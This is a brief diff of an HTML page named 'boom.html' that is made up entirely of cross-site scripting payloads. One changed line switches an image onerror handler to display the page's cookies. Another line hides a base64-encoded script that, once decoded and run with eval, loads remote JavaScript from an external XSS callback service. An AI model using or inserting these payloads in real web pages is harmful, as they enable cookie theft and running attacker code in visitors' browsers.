--- a/boom.html
+++ b/boom.html
@@ -8,7 +8,7 @@
 <body>
     <br><BR><BR><BR>
 <h1>pwn<br>
-"><img src=x onerror=prompt(window.origin)>
+"><img src=x onerror=prompt(document.cookie)>
 "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLnJlcG9ydC9jL2Jvb202NzAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
 </body>
 </html>
